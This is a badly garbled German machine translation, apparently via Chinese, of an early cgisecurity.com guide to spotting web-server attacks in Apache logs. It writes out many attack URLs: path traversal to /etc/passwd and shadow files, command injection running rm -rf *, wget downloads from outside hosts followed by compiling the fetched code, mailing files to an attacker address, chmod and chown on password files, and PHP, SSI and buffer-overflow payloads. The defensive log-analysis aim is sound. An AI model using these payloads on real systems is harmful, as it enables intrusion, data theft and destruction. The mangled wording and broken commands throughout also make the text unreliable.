I. Zusammenfassung
II. Eine detaillierte Beschreibung der
III. Weitere
IV. Spillover Analysis
V. Transcoding
VI. Schlussfolgerung
[Abstract]
Website 80 als Standard-Service-Port, über die verschiedenen Sicherheits-Probleme halten Sie von der Veröffentlichung, einige dieser Schwachstellen ein Angreifer sogar den Systemadministrator, um die Erlaubnis, geben Sie die Website selbst zu ermöglichen, ist die folgende Zenomorph Port 80 Angriffe auf einige der Spuren Forschung, und sagen Ihnen, wie man Probleme aus dem Log-Aufzeichnungen finden.
[Detail]
Der folgende Abschnitt durch einige Liezi Display auf Web-Servern und deren Anwendungen auf den Angriff im Allgemeinen und ihre Spuren hinterlassen, Vertreter der Lie Zi Jin Jin ist die wichtigste Methode des Angriffs hat der Angriff nicht alle Formen dieser Teil wird detaillierte Beschreibung der Rolle der einzelnen Angriff, und seine, wie diese Schwachstellen für Angriffe ausnutzen.
(1) "." ".." Und "..." Anfrage
Die Spuren dieser Angriffe sind sehr häufig für Web-Applikationen und Web-Server, die es einem Angreifer ermöglichen oder Wurm-Virus-Programm auf dem Web-Server-Pfad ändern, um den Zugang zu geschlossenen Bereichen verwendet zu gewinnen. Die meisten CGI-Programme mit diesen Fehler, ".." beantragen.
Beispiel:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
Dies zeigt die Angreifer Liezi Anfrage MOSD diese Datei, wenn der Angreifer die Möglichkeit, bahnbrechende Web-Server Root-Verzeichnis, dann weitere Informationen erhalten und um weitere Rechte zu erlangen.
(2) "% 20" Anfrage
% 20 ist die Hex-Wert, dass die 16 Räume, obwohl dies nicht bedeutet, kann man alles verwenden, aber wenn Sie das Protokoll anzeigen, wird es finden, einige Web-Server-Anwendung auf diesen Charakter laufen kann effektiv umgesetzt werden Daher sollten Sie sorgfältig überprüfen Sie das Protokoll. Auf der anderen Seite kann der Antrag manchmal dazu beitragen, einige Befehle ausführen.
Beispiel:
http://host/cgi-bin/lame.cgi?page=ls% 20-al |
Dies zeigt ein Angreifer zum Ausführen Liezi ein Unix-Kommando, das Inserat Verzeichnis die Datei angefordert, dass der Angreifer Zugang zu Ihrem System, ein wichtiger Text, der die Bedingungen für seine weitere Administratorrechte erhalten hilft.
(3) "% 00" Anfrage
% 00, sagte der 16-Byte hexadezimal leer, konnte er die Web-Anwendung Narr, und fordern Sie verschiedene Arten von Dateien.
Beispiele:
http://host/cgi-bin/lame.cgi?page=index.html
Dies kann ein gültiger Antrag in der Maschine sein, wenn ein Angreifer über diese Anfrage erfolgreich war, wird er weiter für die CGI-Verfahren zu suchen.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Vielleicht ist das CGI-Programm nicht akzeptiert diesen Antrag, weil sie die Anfrage an den Dateinamen-Suffix, wie zB: html.shtml oder andere Arten von Dateien zu überprüfen ist. Die meisten Programme werden Ihnen die angeforderte Datei ist ungültig, wird es diesmal sage dem Angreifer Zugriffe der Datei muss ein Charakter einer Dateityp-Suffix, so kann ein Angreifer das System zu erhalten Pfad, Dateiname, die sich in Ihr System mehr sensible Informationen
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd% 00html
Aufmerksamkeit auf diese Aufforderung, wird es CGI-Programm zu betrügen, dass dieses Dokument an den zulässigen Dateitypen zu bestimmen, ist, dass einige Anwendungen der effektiven Kontrollen als dumm Anfrage-Datei, die gemeinhin Methoden der Angreifer verwendet wird.
(4) "|" Anfrage
Dies ist ein Pipe-Zeichen, in dem Unix-System, ein Ersuchen um Hilfe bei der Durchführung von mehreren System-Befehle zur gleichen Zeit.
Beispiel:
# Cat access_log | grep-i ".."
(Dieser Befehl wird das Protokoll in der ".." Anfrage, meist in den Angriffen und Würmern verwendet Display gefunden)
Oft feststellen, dass viele Web-Anwendungen dieses Zeichen zu verwenden, dies führt auch zu Fehlalarmen in den IDS-Logs.
In der sorgfältigen Prüfung Ihres Antrags, so dass der Vorteil der Vermeidung von Fehlalarmen in Intrusion Detection Systeme.
Hier sind einige von Lie Zi:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
Dieser Antrag Befehl, die folgenden sind einige Änderungen in Liezi
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls% 20% al-20/etc |
Dieser Antrag ist in der Unix-System / etc-Verzeichnis alle Dateien aufgelistet
http://host/cgi-bin/lame.cgi?page=cat% 20access_log | grep-i% 20% 20 "lame"
Die Katze Befehlsausführung Anfrage und die Umsetzung der grep-Befehl wird auch, lesen Sie in der "lahmen"
(5) ";" Anfrage
In UNIX-Systemen, ermöglicht dieses Zeichen mehrere Befehlszeilenausführung
Beispiel:
# Id; uname-a
(Umsetzung der id-Befehl, durch Umsetzung des Befehls uname folgen)
Einige Web-Programm mit diesem Charakter, ist möglicherweise in Ihren IDS-Logs Ergebnis eine Warnung des Scheiterns, sollten Sie sorgfältig überprüfen Sie Ihre Web-Applikation, so dass Sie das Risiko des Scheiterns des IDS Alerts zu reduzieren.
(6) " " und " " Request
Sollte überprüfen Sie Ihre Logs aufzeichnen die beiden Charaktere, eine Reihe von Gründen, ist der erste Charakter, dass die zusätzlichen Daten in dem Dokument
Beispiel 1:
# Echo "Ihre hax0red H0 H0" / etc / motd (motd Anfrage schriftliche Informationen in diesem Dokument)
Ein Angreifer kann leicht benutzen Sie den Antrag wie oben Manipulation Ihrer Webseite ein. Wie die berühmte RDS nutzen die Angreifer wird häufig verwendet, um die Webseite zu ändern.
Beispiel 2:
http://host/something.php=Hi% 20mom% 20im% 20Bold!
Html werden Sie feststellen, dass die Sprache der Zeichen hier verbrachte er auch " "," " Zeichen, solche Angriffe kann nicht die Ursache der Angreifer Zugriff auf das System, verwirrt sie die Menschen denke, dies ist eine legitime Website-Informationen (führt zu Die Leute besuchen Sie diesen Link, um den Angreifer zu besuchen, um die Adresse eingestellt wird, kann diese Anforderung in 16 Hex-Zeichen in Form kodiert werden, so dass Spuren des Angriffs nicht so offensichtlich ist)
(7) "!" Request
Gemeinsame Sprache auf dieses Zeichen Anfrage SS (Server Side Include) I Angriff, wenn der Angreifer einen Angreifer zu verwirren den Benutzer klickt auf den Link gesetzt, und das gleiche wie oben.
Beispiel:
http://host1/something.php =
Die Lieh-tzu ist der Angreifer kann eine Datei auf der Website von host2 tun host1 erscheint oben (erfordert selbstverständlich die Besucher des Angreifers Verbindungseinstellungen zu besuchen. Dieser Antrag kann in Bargeld umgewandelt werden 16 hexadezimalen Kodierung Maske, nicht leicht zu finden)
Zur gleichen Zeit, kann dieser Ansatz auch den Befehl Behörde Website
Beispiel:
http://host/something.php =
Die Lieh-auf dem entfernten System "id" Befehl ausführen, wird es die Website Benutzer-ID-Anzeige, ist in der Regel "nobody" oder "www"
Dieses Formular ermöglicht auch die versteckten Dateien enthalten.
Beispiel:
http://host/something.php =
Die versteckten Dateien. Htpasswd wird nicht angezeigt, wird der Apache weigern, solche Regeln zu. Ht schaffen das Antragsformular und SSI-Logo wird diese Beschränkungen zu umgehen und zu Sicherheitsproblemen führen
(8) "," Request
Der Angriff auf die Fernbedienung für das Web Shi Zhong Tu einfügen PHP-Anwendung verarbeiten, kann es ermöglichen, Befehle auszuführen, je nach Server-Einstellungen und andere Arbeiten von einer Reihe von Faktoren (比如 PHP-Einstellungen für Sicherheit Moshi)
Beispiel: http://host/something.php = passthru ("id ");?
In ein paar einfache PHP-Anwendung, kann es im entfernten System werden zur Baustelle Erlaubnis des Benutzers auf den lokalen Befehl ausführen web
(9) "" "Anfrage
Dieser Charakter später benutzt, um Befehle in Perl ausführen, wird die Zeichen in der Web-Anwendung nicht häufig verwendet, so dass, wenn Sie es in Ihrem anmelden, sollten sehr vorsichtig sein
Beispiel:
http://host/something.cgi = `id`
Schreiben Sie eine Perl-CGI-Programm in Frage würde die Umsetzung des id-Befehl führen
[Weiter]
Im folgenden Abschnitt wird die Durchführung der Angriffe mehr besprechen konnten Befehl, zusammen mit den Unterlagen angefordert, und wenn Sie eine Remote-Ausführung von Befehlen Fehler, sollte es, wie die Entdeckung zu überprüfen. Dieser Teil ist nur, um Ihnen eine gute Idee, und sagen Sie Ihrem System, was geschieht, versuchen die Angreifer, um Ihr System Spuren anzugreifen, aber nicht alle aufzählen den Angreifer auf die Befehle und Anfragen verwenden.
"/ Bin / ls"
Dieser Befehl fordert den gesamten Pfad, in vielen Web-Anwendungen aller Schlupflöcher, wenn Sie sich in vielen Orten einen solchen Antrag ist es für große entfernte Befehlsausführung Sicherheitslücke möglich, aber nicht unbedingt ein Problem kann auch ein falscher Alarm. Noch einmal erinnert, Webapplikation geschrieben (CGI, ASP, PHP etc ...) ist die Grundlage der Sicherheit
Beispiel:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% 20-al |
http://host/cgi-bin/bad.cgi?doh=ls% 20-al;
"Cmd.exe"
Dies ist ein Fenster der Shell, wenn ein Angreifer den Zugriff auf und führen Sie dieses Skript in die Server-Einstellungen unter den Bedingungen in der Windows-Maschine kann alles erlaubt, eine Menge von Würmern zu tun ist über Port 80, Mitteilung für die Remote-Rechner
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ Bin / id"
Dies ist ein zwei binäre Dateien, die Probleme und / bin / ls, wie, wenn man an vielen Orten ein solches Ersuchen log, ist es für große Remote-Ausführung Befehl Sicherheitslücke möglich, aber nicht unbedingt ein Problem kann auch ein falscher Alarm.
Es wird sich zeigen, welcher Teil gehört, die Benutzer-und Gruppen
Beispiel:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id |
http://host/cgi-bin/bad.cgi?doh=id;
"/ Bin / rm"
Mit diesem Befehl können Dateien ohne den richtigen Einsatz zu löschen ist sehr gefährlich
Beispiele:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm% 20% 20-rf * |
http://host/cgi-bin/bad.cgi?doh=rm% 20% 20-rf *;
"Wget und TFTP"-Befehl
Diese Befehle sind oft die Angreifer möglicherweise weitere Rechte, um Dateien herunterzuladen gewinnen, wget ein Unix-Befehl nach, so kann verwendet werden, um Backdoors herunterladen werden kann, ist unter dem Befehl tftp UNIX und NT, wird verwendet, um die Datei herunterzuladen. Einige IIS-Würmern über TFTP-Virus verbreitet sich auf andere Hosts replizieren
Beispiele:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget% 20http: / / host2/Phantasmp.c | http:// Host / cgi-bin / bad.cgi? doh = wget% 20http: / / www.hwa-security.net/Phantasmp.c;
"Cat"-Befehl
Dieser Befehl wird verwendet, um den Inhalt der Datei, die verwendet werden, um wichtige Informationen zu lesen, wie Konfigurationsdateien, Passwort-Dateien, Kredit-Dateien und Dokumente können Sie denken Blick
Beispiele: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat% 20/etc/motd | http://host/cgi-bin/ bad.cgi? doh = cat% 20/etc/motd;
"Echo"-Befehl
Dieser Befehl verwendet, um Daten in die Datei geschrieben, wie "index.html"
Beispiele: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 "fc-# Kiwis% 20was% 20here"% 20 200day.txt% | http://host/cgi-bin/bad.cgi?doh=echo% 20 "fc-# Kiwis% 20was% 20here"% 20 200day.txt%;
"Ps"-Befehl
Führt die derzeit laufenden Prozess, den Angreifer zu sagen, dass ein Remote-Host-Software ausgeführt wird, um eine Vorstellung von Sicherheitsproblemen zu bekommen, weitere Genehmigungen einzuholen
Beispiele: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% 20-aux | http://host/cgi-bin/bad. cgi? doh =% 20 ps-aux;
"Kill und killall"-Befehl
Unix-Systeme, um diesen Prozess zu beenden, kann ein Angreifer diesen Befehl verwenden, um die System-Dienste und Prozesse stoppen können auch löschen Sie die Spuren der Angreifer, manche nutzen wird eine Menge von untergeordneten Prozessen produzieren
Beispiele: http://host/cgi-bin/bad.cgi?doh=../bin/kill% 20-9% 200 | http://host/cgi-bin/bad.cgi?doh=kill% 20 -9% 200;
"Uname"-Befehl
Dieser Befehl sagt dem Angreifer die Remote-Maschine den Namen, die für einige Zeit, über diese Website, um zu wissen, welcher ISP, ein Angreifer, der heute besichtigt werden können. Uname-a normal Anfrage, diese werden in der Log-Datei aufgezeichnet werden
Beispiele: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname% 20-a | http://host/cgi-bin/bad. cgi? doh =% 20 uname-a;
"Cc, gcc, Perl, Python, etc ..." Compilation / Interpretation des Befehls
Angreifer durch wget oder TFTP-Download zu nutzen, und die Benutzung des cc, gcc-Compiler, um diese in ein ausführbares Programm kompilieren und weitere Zugriffsberechtigungen
Beispiele: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. cgi? doh = gcc% 20Phantasmp.c;. / a.out% 20% p-2031337;
Wenn Sie die Protokolle in "Perl" Python "Diese Anleitung finden kann ein entfernter Angreifer Perl, Python-Skript herunterladen, und versucht, die Privilegien des lokalen erhalten
"Mail"-Befehl
Angreifer verwenden häufig diesen Befehl System, einige wichtige Dokumente für den Angreifer die eigene Mailbox, sondern auch bereit ist, e-mail Bombenanschläge durchgeführt werden,
Beispiele: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail 20attacker@fuckcnhonker.org%% 20
2.168.22.1;
"Chown, chmod, chgrp, chsh, etc ..." und andere Befehle
Unix-Systeme, um ihnen zu ermöglichen, die Dateiberechtigungen ändern
chown = ermöglicht die Einstellung der Besitzer einer Datei chmod = erlaubt Dateiberechtigungen chgrp = set kann der Eigentümer der Gruppe Berechtigungen für Dateien ändern chsh = darf die Shell des Benutzers ändern
Beispiele: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod% 20.777% 20index.html | http://host/cgi-bin/ bad.cgi? doh = chmod% 20.777% 20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown 20zeno%% 20 / etc / master.passwd | http://host/cgi-bin/bad.cgi?doh=chsh% 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / bin / chgrp% 20nobody 20/etc/shadow% |
"/ Etc / passwd"-Datei
Dies ist die System-Passwort-Datei, in der Regel Schatten ab, und nicht erlauben, das verschlüsselte Passwort zu sehen, aber für einen Angreifer, der weiß, was gültig ist Benutzer kann und das System der absoluten Pfad, Site-Namen und andere Informationen, wie es gewöhnlich von shadow off, so der Angreifer wird normalerweise unter / etc / shadow-Datei
"/ Etc / master.passwd"
Diese Datei ist die BSD-System-Passwort-Datei enthält das verschlüsselte Passwort, wird die Datei auf den Root-Account nur read-only, und einige ungelernte Angreifer eröffnet seinen Versuch, die Inhalte innerhalb lesen., Wenn die Web-Site ist Root-Rechten laufen, so der Angreifer ist, können wir die Inhalte innen lesen, eine Menge Probleme auf dem System-Administrator wird einer nach dem anderen kommen
"/ Etc / shadow"
Enthält ein Passwort verschlüsselt System, lesen die gleichen auf den Root-Account, und / et / master.passwd fast
"/ Etc / motd"
Wenn Benutzer in die UNIX-System anmelden, die Informationen, erscheint in der "Message of the Day"-Datei enthält er wichtige Systeminformationen und Administrator der Nutzer einige gesetzt, Anwender, die diejenigen, die nicht sehen wollen, Außerdem enthält die Version des Systems Informationen, die Angreifer in der Regel finden diese Datei, um zu verstehen, was das System wird auf den Angreifer läuft, ist der nächste Schritt, um für diese Art von System zu nutzen suchen, und einen weiteren Zugang zu System-Privilegien
"/ Etc / hosts"
Das Dokument stellt die IP-Adresse und Netzwerk-Informationen, kann ein Angreifer das System mehr über die Netzwerkeinstellungen zu lernen
"/ Usr / local / apache / conf / httpd.conf"
Dies ist ein Apache Web-Server-Konfigurationsdatei, ein Angreifer kann verstehen, wie CGI, SSI und andere Informationen zugänglich
"/ Etc / inetd.conf"
Dies ist ein Service inetd-Konfigurationsdatei, kann ein Angreifer den entfernten Rechner zu lernen, diese Dienste zu starten, ob der Wrapper die Zugriffskontrolle zu verwenden, wenn der Wrapper gefunden wurde ausgeführt, kann ein Angreifer den nächsten Schritt überprüfen "/ etc / hosts.allow" und "/ etc / hosts.deny"-Datei, und das kann einige Einstellungen, Zugriffsrechte zu ändern
". Htpasswd. Htaccess und. Htgroup"
Diese Dateien sind typischerweise in web site Benutzer-Authentifizierung verwendet, könnte ein Angreifer diese Dateien anzuzeigen, und erhalten einen Benutzernamen und ein Passwort, das Passwort-Datei. Htpasswd vorbei ist, verschlüsselt durchbrechen einige einfache Entschlüsselung Prozess, bei dem ein Angreifer Zugriff auf die Website Schutzgebiete (in der Regel der Benutzer mit den gleichen Benutzernamen und das Passwort, kann der Angreifer sogar besuchen anderes Konto)
"Access_log und error_log"
Dies sind die Apache-Server-Log-Dateien, die Angreifer oft diese Dateien anzuzeigen, Blick auf diese Anfragen werden aufgezeichnet, diese und andere Anfragen für verschiedene Orte
Typischerweise wird der Angreifer diesen Log-Dateien, wie seine eigenen Adressdaten ändern, dass der Angreifer durch den Port 80 durch Ihr System und Ihre Backup-System auch nicht funktioniert, gibt es keine andere Sendung aufnehmen record system status, was Intrusion Detection wird sehr schwierig, Arbeit zu
"[Laufwerksbuchstabe]: winntrepairsam._ oder [Laufwerksbuchstabe]: winntrepairsam"
Windows NT-System-Passwort-Datei, wenn der Remote-Befehl nicht implementiert werden kann, wird in der Regel Anfrage Angreifer diese Unterlagen dann "L0pht crack" von der Art der Passwort-Cracking-Tools zu knacken, wenn der Angreifer versucht, Administrator-Passwort-Datei, anzugreifen, wenn erfolgreich, dann den entfernten Rechner wird der Angreifer nun Kontrolle
[Overflow-Analyse]
In diesem Artikel möchte ich nicht sagen, wird zu viel über den Überlauf des Themas, werde ich herausfinden, was diese Phänomene und Spuren von bemerkenswert und ein besonderes Anliegen, einen Puffer wird oft durch die Angreifer Code-Konvertierung und schwer angegriffen, andere Wege zu finden, zu erreichen
Hier ist eine einfache Lie Zi
Beispiel: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
Diese Liezi zeigt die Angreifer über einen Antrag auf eine Menge eines Charakters zu schicken, um das Programm zu testen einen Pufferüberlauf, kann buffer overflow einem Remote-Ausführung von Befehlen Host-Berechtigungen, wenn der Eigentümer hat das setuid und Verfahren für die Wurzel, durch den Überlauf, kann der Zugriff auf das gesamte System zu bekommen, wenn nicht wie setuid-Programm, dann ist der Überlauf nur durch Ausführen der Web-Site der Benutzerrechte
Hier kann nicht sagen, alle Umstände, aber Sie sollten regelmäßig überprüfen Sie Ihre Log-Datei, wenn dieser Tag plötzlich eine Menge Anfragen, aber in der Regel nicht mehr als Antrag, bedeutet es Ihnen, Overflow-Angriffen, natürlich ausgesetzt sind, können auch Ein neues Netzwerk Wurm-Attacke
[Transcoding]
All die Angriffe oben genannten Antrag, dass der Angreifer in der Regel weiß, IDS-Systeme oft mechanische Schecks anfordern, in der Regel der Angreifer wird die Verwendung der Daten Konvertierungs-Werkzeug, um den angeforderten Inhalt Format 16 Band zu konvertieren, wodurch IDS wird diese Anfragen zu ignorieren, Wir sind vertraut mit den CGI-Schwachstellen-Scan-Tool, dass eine gute Liezi Whisker ist. Wenn Sie das Protokoll der Zeit gefunden Ansicht einer großen Anzahl von 16-Band und nicht einige gemeinsame Merkmale, dann kann der Angreifer versuchen, einige der Wege, um Ihr System angreifen verwenden
Ein schneller Weg ist Ihre Log-Datei der Antrag bei diesen 16 hex, kopieren Sie sie in Ihrem Browser, kann der Browser in den rechten Anfrage umgewandelt werden, angezeigt und der Inhalt des Antrags, wenn Sie nicht Mut zu diesem Risiko, ein einfacher Mann, ASCII, können Sie mit dem richtigen Code geben.
[Fazit]
Dieser Artikel kann nicht alle der 80 Häfen der Angriff, aber die meisten haben schon mehr als der allgemeine Angriff zitiert, und sagen Ihnen, wie Sie Ihre Log-Dateien zu überprüfen, und wie man hinzufügen, wie z. B. die Zahl der IDS Regeln ihr Ziel zu schreiben, ist zu Web-System-Administrator sollte über das, was eine gute Idee, zur gleichen Zeit, ich hoffe, dieser Artikel hilft, Web-Entwickler Web-Programm, um bessere Programme schreiben betroffenen
Anmerkung: Wenn Sie irgendwelche Kommentare und Anregungen haben, schicken Sie bitte eine E-Mail admin@cgisecurity.com.